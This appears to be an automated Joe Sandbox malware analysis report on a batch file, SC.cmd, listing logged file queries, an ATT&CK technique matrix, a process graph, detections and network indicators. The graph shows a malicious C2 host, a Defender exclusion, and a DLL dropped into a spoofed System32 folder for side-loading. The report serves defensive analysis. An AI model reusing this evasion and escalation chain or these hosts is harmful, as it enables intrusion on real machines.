Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows \System32\ComputerDefaults.exeCode function: 10_2_00007FF64D60A534 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter,10_2_00007FF64D60A534
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts31
Windows Management Instrumentation
1
DLL Side-Loading
1
DLL Side-Loading
1
Disable or Modify Tools
11
Input Capture
1
System Time Discovery
Remote Services1
Archive Collected Data
1
Ingress Tool Transfer
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts12
Command and Scripting Interpreter
Boot or Logon Initialization Scripts11
Process Injection
1
Obfuscated Files or Information
LSASS Memory1
File and Directory Discovery
Remote Desktop Protocol11
Input Capture
11
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts2
PowerShell
Logon Script (Windows)Logon Script (Windows)1
DLL Side-Loading
Security Account Manager34
System Information Discovery
SMB/Windows Admin SharesData from Network Shared Drive1
Non-Standard Port
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
File Deletion
NTDS151
Security Software Discovery
Distributed Component Object ModelInput Capture2
Non-Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script121
Masquerading
LSA Secrets1
Process Discovery
SSHKeylogging13
Application Layer Protocol
Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts41
Virtualization/Sandbox Evasion
Cached Domain Credentials41
Virtualization/Sandbox Evasion
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
Process Injection
DCSync1
Application Window Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Hidden Files and Directories
Proc Filesystem1
System Network Configuration Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1524980 Sample: SC.cmd Startdate: 03/10/2024 Architecture: WINDOWS Score: 100 56 azure-winsecure.com 2->56 58 ipwho.is 2->58 70 Suricata IDS alerts for network traffic 2->70 72 Malicious sample detected (through community Yara rule) 2->72 74 Multi AV Scanner detection for dropped file 2->74 76 6 other signatures 2->76 10 cmd.exe 1 2->10         started        13 svchost.exe 1 1 2->13         started        signatures3 process4 dnsIp5 82 Suspicious powershell command line found 10->82 84 Suspicious command line found 10->84 16 powershell.exe 14 36 10->16         started        21 conhost.exe 10->21         started        23 cmd.exe 1 10->23         started        60 127.0.0.1 unknown unknown 13->60 signatures6 process7 dnsIp8 52 azure-winsecure.com 154.216.20.132, 49736, 7000 SKHT-ASShenzhenKatherineHengTechnologyInformationCo Seychelles 16->52 54 ipwho.is 195.201.57.90, 443, 49742 HETZNER-ASDE Germany 16->54 46 C:\Windows \System32\MLANG.dll, PE32+ 16->46 dropped 48 C:\Users\user\AppData\Local\Temp\MLANG.dll, PE32+ 16->48 dropped 50 C:\Windows \System32\ComputerDefaults.exe, PE32+ 16->50 dropped 62 Suspicious powershell command line found 16->62 64 Adds a directory exclusion to Windows Defender 16->64 66 Hides that the sample has been downloaded from the Internet (zone.identifier) 16->66 68 2 other signatures 16->68 25 powershell.exe 21 16->25         started        28 cmd.exe 1 16->28         started        30 cmd.exe 1 16->30         started        32 2 other processes 16->32 file9 signatures10 process11 signatures12 78 Loading BitLocker PowerShell Module 25->78 34 WmiPrvSE.exe 25->34         started        36 conhost.exe 25->36         started        80 Drops executables to the windows directory (C:\Windows) and starts them 28->80 38 conhost.exe 28->38         started        40 ComputerDefaults.exe 12 28->40         started        42 conhost.exe 30->42         started        process13 process14 44 conhost.exe 42->44         started       

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
SC.cmd0%ReversingLabs
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\MLANG.dll21%ReversingLabsWin64.Trojan.Generic
C:\Windows \System32\ComputerDefaults.exe0%ReversingLabs
C:\Windows \System32\MLANG.dll21%ReversingLabsWin64.Trojan.Generic
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://nuget.org/NuGet.exe0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://nuget.org/nuget.exe0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://oneget.orgX0%URL Reputationsafe
https://g.live.com/odclientsettings/ProdV2.C:0%URL Reputationsafe
https://aka.ms/pscore680%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
https://oneget.org0%URL Reputationsafe
NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.210.172
truefalse
    unknown
    ipwho.is
    195.201.57.90
    truefalse
      unknown
      azure-winsecure.com
      154.216.20.132
      truetrue
        unknown
        NameMaliciousAntivirus DetectionReputation
        https://ipwho.is/false
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          https://g.live.com/odclientsettings/Prod.C:edb.log.15.drfalse
            unknown
            http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.1751775240.0000018224113000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1765457198.0000018233DBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1765457198.0000018233EF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1852505042.000001BE90072000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000004.00000002.1751775240.0000018225361000.00000004.00000800.00020000.00000000.sdmpfalse
              unknown
              https://g.live.com/odclientsettings/ProdV2edb.log.15.drfalse
                unknown
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.1807481747.000001BE80227000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96svchost.exe, 0000000F.00000003.1901721874.000002494C922000.00000004.00000800.00020000.00000000.sdmp, edb.log.15.drfalse
                  unknown
                  https://go.microsoft.copowershell.exe, 00000004.00000002.1768282215.000001823BEF0000.00000004.00000020.00020000.00000000.sdmpfalse
                    unknown
                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000005.00000002.1807481747.000001BE80227000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.1807481747.000001BE80227000.00000004.00000800.00020000.00000000.sdmpfalse
                      unknown
                      https://go.micropowershell.exe, 00000004.00000002.1751775240.0000018224C72000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000005.00000002.1807481747.000001BE80227000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://contoso.com/powershell.exe, 00000005.00000002.1852505042.000001BE90072000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.1765457198.0000018233DBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1751775240.0000018225A3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1751775240.0000018224015000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1765457198.0000018233EF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1852505042.000001BE90072000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://contoso.com/Licensepowershell.exe, 00000005.00000002.1852505042.000001BE90072000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://contoso.com/Iconpowershell.exe, 00000005.00000002.1852505042.000001BE90072000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://oneget.orgXpowershell.exe, 00000004.00000002.1751775240.0000018225361000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://crl.ver)svchost.exe, 0000000F.00000002.3543457635.000002494CA00000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        https://g.live.com/odclientsettings/ProdV2.C:edb.log.15.drfalse
                        • URL Reputation: safe
                        unknown
                        https://aka.ms/pscore68powershell.exe, 00000004.00000002.1751775240.0000018223D31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1807481747.000001BE80001000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.1751775240.0000018223D31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1807481747.000001BE80001000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 0000000F.00000003.1901721874.000002494C922000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.15.dr, edb.log.15.drfalse
                          unknown
                          https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.1807481747.000001BE80227000.00000004.00000800.00020000.00000000.sdmpfalse
                            unknown
                            https://oneget.orgpowershell.exe, 00000004.00000002.1751775240.0000018225361000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            154.216.20.132
                            azure-winsecure.comSeychelles
                            135357SKHT-ASShenzhenKatherineHengTechnologyInformationCotrue
                            195.201.57.90
                            ipwho.isGermany
                            24940HETZNER-ASDEfalse
                            IP
                            127.0.0.1
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1524980
                            Start date and time:2024-10-03 14:51:20 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 8m 37s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:20
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:SC.cmd
                            Detection:MAL
                            Classification:mal100.spyw.evad.winCMD@23/24@2/3
                            EGA Information:
                            • Successful, ratio: 66.7%
                            HCA Information:
                            • Successful, ratio: 79%
                            • Number of executed functions: 27
                            • Number of non-executed functions: 46
                            Cookbook Comments:
                            • Found application associated with file extension: .cmd
                            • Override analysis time to 240s for powershell
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 199.232.210.172, 184.28.90.27
                            • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, cxcs.microsoft.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, e16604.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net
                            • Execution Graph export aborted for target powershell.exe, PID 600 because it is empty
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtCreateKey calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • VT rate limit hit for: SC.cmd
                            TimeTypeDescription
                            08:52:17API Interceptor14473050x Sleep call for process: powershell.exe modified
                            08:52:34API Interceptor3x Sleep call for process: svchost.exe modified
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            154.216.20.1321.cmdGet hashmaliciousUnknownBrowse
                              2.cmdGet hashmaliciousUnknownBrowse
                                download_2.exeGet hashmaliciousQuasarBrowse
                                  195.201.57.90SPt4FUjZMt.exeGet hashmaliciousAsyncRAT, Luca Stealer, MicroClip, PythonCryptoHijacker, RedLineBrowse
                                  • /?output=json
                                  765iYbgWn9.exeGet hashmaliciousLuca StealerBrowse
                                  • /?output=json
                                  765iYbgWn9.exeGet hashmaliciousLuca StealerBrowse
                                  • /?output=json
                                  WfKynArKjH.exeGet hashmaliciousAsyncRAT, Luca Stealer, MicroClip, RedLineBrowse
